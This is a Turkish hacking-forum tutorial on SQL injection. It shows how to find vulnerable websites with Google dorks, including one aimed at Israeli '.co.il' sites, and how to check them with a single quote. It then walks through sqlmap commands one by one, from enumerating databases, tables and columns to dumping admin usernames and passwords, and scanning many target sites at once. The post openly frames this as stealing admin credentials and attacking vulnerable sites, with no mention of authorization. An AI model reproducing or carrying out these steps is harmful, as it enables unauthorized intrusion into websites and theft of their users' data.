Merhaba THT Ailesi
Sizlere Bugün;
-Sql Nedir?
-Sql Açığı Nedir?
-Sql Açıklı Bir Web Sitesi Nasıl Bulunur?
-Sqlmap Nedir?
-Sqlmap Nasıl Kullanılır?
Konularını anlatacağım.
Öncelikle Sql Nedir?
Kısaca Sql bir sistemdeki(örneğ web sitesi) veri tabanıdır.
Sql Açığı Nedir?
Sql açığı bir sistemdeki veri tabanındaki açıktır.
Sql Açıklı Bir Web Sitesi Nasıl Bulunur?
Sql açıklı site bulmak için iki yöntem vardır.
1-Otomatik Yöntem
2-Manuel Yöntem
-----------------
Otomatik Yöntem
Otomatik olarak bir web sitesi içindeki tüm sayfaları tek tek tarayan programdır.
Bu yöntemi kullanmak için sizlere "Safe 3" programını tavsiye ederim.(Safe3 programının kullanımı forumda mevcuttur.)
-----------------
Manuel Yöntem
Elle sql açığı bulmaktır.Genellikle dork yazılarak bulunur.(Dorklar google'a yazılır.)Ayrıca forumda güncel açıklı siteleri bulabilirsiniz.
Örneğin:
Kod:
co.il php id=
Sql açığını görmek için bu dorku yazdıktan sonra herhangi bir siteye giriyoruz ardından urlnin sonuna ' (tek tırnak) işareti koyuyoruz eğer site de
Örnek olarak böyle yazıyor ise sitede sql açığı var demektir.
Kod:
mysql_num_rows()Örnek Url;
Kod:
www.hedefsite.com/xxx/xxx.php?id=9'-----------------
Sqlmap Nedir?
Sqlmap "sql" açıklı bir sisteme sızmaya yarayan araçtır.Windows ve kali işletim sistemlerine indirilebilir , bazı Kali sistemlerinde varsayılan uygulama olarak bulunur.
-----------------
Sqlmap Nasıl Kullanılır?
-u Parametresi
Bu parametre hedef url'de açık varsa bu açığın türünü , sunucu versiyonunu , ne tür DBMS(Database Management System) kullandığı gibi bilgileri bize verir.
Kod:
sqlmap -u https://www.hedefsite.com/xxx/xxx.php?id=9
-----------------
--dbs Parametresi
"dbs" parametresini kullanarak hedef site deki "database" yani veri tabanlarının adlarını alabiliriz.
Bu resimde hedef sitemizde iki adet veri tabanı ismi var.
Kod:
sqlmap -u https://www.hedefsite.com/xxx/xxx.php?id=9 --dbs-----------------
--current-db Parametresi
"dbs" parametresinden farkı bize hedef sitede ki mevcut veri tabanının ismini veriyor.
Kod:
sqlmap -u https://www.hedefsite.com/xxx/xxx.php?id=9 --current-db-----------------
-D veritabanıadı --tables Parametresi
-D parametresi mevcut veri tabanının adını girmemiz gereken parametredir.Buraya mevcut veri tabanını girdikten sonra --tables yazmamız gerekir ve o veri tabanının içindeki tablolar listelenir.
Bir siteyi hacklemek için "admin" yada "login" gibi kullanıcı adlarının veya şifrelerini içinde barındıran tabloları incelememiz gerekir.
Kod:
sqlmap -u https://www.hedefsite.com/xxx/xxx.php?id=9 -D veritabanıadı --tables-----------------
-D veritabanıadı -T tabloadı --columns Parametresi
Bir önceki parametrede "--tables" yazmıştık ve bu sayede belirttiğimiz veri tabanı içindeki tablolar bize verildi.Şimdi seçtiğimiz tabloyu yazıyoruz ve o tablonun bir alt basamağı olan kolonları bize verir.
Kod:
sqlmap -u https://www.hedefsite.com/xxx/xxx.php?id=9 -D veritabanıadı -T tabloadı --columns-----------------
-D veritabanıadı -T tabloadı -C kolonadı --dump Parametresi
Bu parametre hedef kolonun içinde ne yazıyorsa bize verir.
**Not : kolonadı yazan yere birden fazla kolon adı yazılabilir.
Örneğin :"-C username,passwd"
Kod:
sqlmap -u https://www.hedefsite.com/xxx/xxx.php?id=9 -D veritabanıadı -T tabloadı -C kolonadı --dump-----------------
Eğer sqlmap ile siteden admin kullanıcı adını ve şifresini çalabilirsek geriye admin panelini bulmak kalıyor. Sitenin admin panelini havij programıyla veya internet üzerinden bulabilirsiniz.
------------------------------------
Sqlmap İle Birden Çok Site Tarama (-m parametresi)
Sqlmap ile birden fazla site taramak istiyorsak öncelikle
-Bir metin belgesi içine hedef siteleri yazıyoruz ve (örnek olarak) masaüstüne kaydediyoruz.
-Ardından terminale
Kod:
sqlmap -m xxxxxx yerine kaydettiğimiz metin belgesinin yolunu yazıyoruz (Örnek olarak /root/Desktop/hedef.txt)
Fotoğrafın alt kısmında "Do you want to test this url?" sorusu var biz bu soruya "y" dersek bize gösterdiği hedef siteden taramaya başlayacaktır."n" dersek metin belgesindeki sonraki siteye geçicektir."q" dersek sqlmap'ten çıkacaktır.
**Not : Sorunun üstündeki üstü karalı olan yer metin belgesindeki siteleri gösterir
------------------------------------
Bu şekilde sqlmap kullanarak sql açıklı sitelere saldırabilirsiniz
-Sqlmap programı hakkında sorularınız varsa ÖM atabilir veya yorum yazabilirsiniz-
Son düzenleme:
)
